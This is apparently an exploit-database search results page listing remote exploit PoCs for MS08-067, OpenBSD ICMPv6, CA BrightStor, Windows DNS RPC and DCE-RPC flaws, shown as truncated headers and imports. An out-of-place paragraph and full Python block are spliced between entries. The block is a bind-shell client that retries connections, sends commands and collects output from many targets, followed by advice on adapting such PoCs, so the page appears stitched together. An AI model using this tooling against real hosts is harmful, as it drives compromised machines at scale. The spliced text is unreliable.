230 matches found
OpenBSD - ICMPv6 Fragment Remote Execution Exploit PoC
No description provided by source. The PoC executes the shellcode int 3 and returns. It overwrites the extfree function pointer on the mbuf and forces a mfreem on the overflowed packet. The Impacket library is used to craft and send packets http://oss.coresecurity.com/projects/impacket.html or...
MS Windows Server Service - Code Execution Exploit (MS08-067)
No description provided by source. #!/usr/bin/env python Ms08067 exploit by Oopohh. I only wrote the payload of this exploit for the Windows XP SP2 version; against other versions such as 2000, 2003 and XP SP3 it can only crash the process. This remote exploit can also run the shutdown command. The Python library impacket must be installed. from impacket.dcerpc import transport,dcerpc from impacket import uuid shellcode = '' shellcode +=...
Python tools for Pentesters
If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest trying out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them. Most of the listed tools are written in Python, others are just Python...
[SET v5.1] The Social-Engineer Toolkit codename “Name of the Doctor”
The Social-Engineer Toolkit SET version 5.1 codename “Name of the Doctor” has been released. This version adds a complete rewrite of the MSSQL Bruter as well as a new attack vector utilizing the PSExec functionality within Metasploit. The MSSQL Bruter now incorporates UDP port 1434 quick...
Windows MS08-067 buffer overflow vulnerability
No description provided by source. #!/usr/bin/env python # coding=utf-8 import struct import sys import socket from threading import Thread Thread is imported in case you would like to modify the src to run against multiple targets from urlparse import urlparse try: from impacket import smb from...
MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3) - the exploit - warning - the black bar safety net
#!/usr/bin/env python MS08-067 Exploit by Debasis Mohanty aka Tr0y/nopsled www.hackingspirits.com www.coffeeandsecurity.com Email: d3basis.m0hanty @ gmail.com import struct import sys from threading import Thread Thread is imported in case you would like to modify the src to run against multipl...
MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)
No description provided by source. #!/usr/bin/env python MS08-067 Exploit by Debasis Mohanty aka Tr0y/nopsled www.hackingspirits.com www.coffeeandsecurity.com Email: d3basis.m0hanty @ gmail.com import struct import sys from threading import Thread Thread is imported in case you would like to modify...
MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)
Exploit for unknown platform in category remote exploits ==================================================================== MS Windows Server Service Code Execution Exploit MS08-067 2k/2k3 ==================================================================== #!/usr/bin/env python MS08-067 Exploit...
ms08067-2k2k3.txt
#!/usr/bin/env python MS08-067 Exploit by Debasis Mohanty aka Tr0y/nopsled www.hackingspirits.com www.coffeeandsecurity.com Email: d3basis.m0hanty @ gmail.com import struct import sys from threading import Thread Thread is imported in case you would like to modify the src to run against multiple...
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)
Microsoft Windows Server 2000/2003 - Code Execution MS08-067 #!/usr/bin/env python MS08-067 Exploit by Debasis Mohanty aka Tr0y/nopsled www.hackingspirits.com www.coffeeandsecurity.com Email: d3basis.m0hanty @ gmail.com E-DB Note: Exploit Update...
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
#!/usr/bin/python Remote exploit for the 0day Windows DNS RPC service vulnerability as described in https://www.securityfocus.com/bid/23470/info. Tested on Windows 2000 SP4. The exploit, if successful, binds a shell to TCP port 4444 and then connects to it. Cheers to metasploit for the first exploit...
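The DNS RPC entry above says the exploit, on success, binds a shell to TCP port 4444 and then connects to it, and several of the MS08-067 headers in this listing note that Thread is imported so the script can be run against multiple targets. The block below is an added example, not code from any of the exploits listed here: it shows that post-trigger stage only (connect with retry, send one command, collect the output per target from worker threads). Everything it talks to is constructed: a loopback listener that answers a single canned `id` line stands in for the bound shell, the port is chosen by the OS rather than 4444, and the `uid=500(svc)` output is made up.

```python
import socket
import threading
import time

# Constructed stand-in for the shell a successful run would leave listening:
# it answers one command with canned output and closes. Not a real shell.
CANNED = {b"id\n": b"uid=500(svc) gid=500(svc)\n"}


def start_fake_bind_shell(port=0):
    """Bind a loopback listener (port 0 = let the OS pick) and serve one connection in a thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            cmd = conn.recv(1024)
            conn.sendall(CANNED.get(cmd, b"unknown command\n"))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def connect_with_retry(host, port, attempts=20, delay=0.25, timeout=3.0):
    """Poll until the port accepts: the shell may not be listening the instant the exploit returns."""
    last = None
    for _ in range(attempts):
        try:
            return socket.create_connection((host, port), timeout=timeout)
        except OSError as exc:
            last = exc
            time.sleep(delay)
    raise ConnectionError(f"{host}:{port} never accepted a connection: {last}")


def run_command(host, port, cmd, **retry):
    """Connect to the bound shell, send one command line, return what it writes back."""
    with connect_with_retry(host, port, **retry) as s:
        s.sendall(cmd)
        return s.recv(4096)


def run_many(targets, cmd, **retry):
    """One worker thread per (host, port); results keyed by target, failures recorded as strings."""
    results = {}
    lock = threading.Lock()

    def worker(target):
        try:
            out = run_command(target[0], target[1], cmd, **retry)
        except OSError as exc:  # ConnectionError from the retry loop is an OSError too
            out = f"error: {exc}"
        with lock:
            results[target] = out

    threads = [threading.Thread(target=worker, args=(t,)) for t in targets]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def demo():
    """Two constructed targets: one with the stand-in listener, one where nothing listens."""
    live = start_fake_bind_shell()
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    dead = probe.getsockname()[1]  # grabbed and released, so connects there are refused
    probe.close()
    return run_many([("127.0.0.1", live), ("127.0.0.1", dead)], b"id\n", attempts=3, delay=0.05)


if __name__ == "__main__":
    for target, out in demo().items():
        print(target, out)
```

The retry loop is the part worth keeping when adapting a PoC like the ones listed: a single immediate connect after the trigger races the service's shellcode and produces a spurious "failed" verdict, while a bounded poll with a per-attempt timeout distinguishes "not yet bound" from "never bound" and reports the last socket error for the latter.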
caid-msgeng.txt
#!/usr/bin/python This one was listed in the SANS TOP 20 and I needed an exploit for analysis. I couldn't find a reliable exploit for my analysis and so came up with this. Remote exploit for the CA BrightStor msgeng.exe service stack overflow vulnerability as described in LS-20060330.pdf on...
CA BrightStor ARCserve (msgeng.exe) Remote Stack Overflow Exploit
Exploit for unknown platform in category remote exploits ================================================================= CA BrightStor ARCserve msgeng.exe Remote Stack Overflow Exploit ================================================================= #!/usr/bin/python This one was listed in the...
OpenBSD - ICMPv6 Fragment Remote Execution
The PoC executes the shellcode int 3 and returns. It overwrites the extfree function pointer on the mbuf and forces a mfreem on the overflowed packet. The Impacket library is used to craft and send packets http://oss.coresecurity.com/projects/impacket.html or download from Debian repositories...
Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A Memory Corruption #!/usr/bin/python MS Windows DCE-RPC svcctl ChangeServiceConfig2A 0day Memory Corruption PoC Exploit Bug discovered by Krystian Kloskowski h07 Tested on Windows 2000 SP4 Polish all patches Requires.. - Impacket :...
Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
#!/usr/bin/python MS Windows DCE-RPC svcctl ChangeServiceConfig2A 0day Memory Corruption PoC Exploit Bug discovered by Krystian Kloskowski h07 Tested on Windows 2000 SP4 Polish all patches Requires.. - Impacket : http://oss.coresecurity.com/projects/impacket.html - PyCrypto :...
CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit
Exploit for unknown platform in category remote exploits ================================================================ CA BrightStor ARCserve msgeng.exe Remote Heap Overflow Exploit ================================================================ #!/usr/bin/python I couldn't find a reliable...
Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service
#!/usr/bin/python MS Windows Workstation Service NetrWkstaUserEnum 0day Memory Allocation Remote DoS Exploit Bug discovered by h07 Tested on:.. - Windows XP SP2 Polish - Windows 2000 SP4 Polish + All Microsoft Security Bulletins Example: wksdos.py 192.168.0.2 512 MS Windows NetrWkstaUserEnum 0day...
Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service
Microsoft Windows - spoolss GetPrinterData Remote Denial of Service #!/usr/bin/python MS Windows spoolss GetPrinterData 0day Memory Allocation Remote DoS Exploit Bug discovered by h07 Tested on Windows 2000 SP4 Polish + All Microsoft Security Bulletins Example: C:\python spoolssdos.py 192.168.0.2...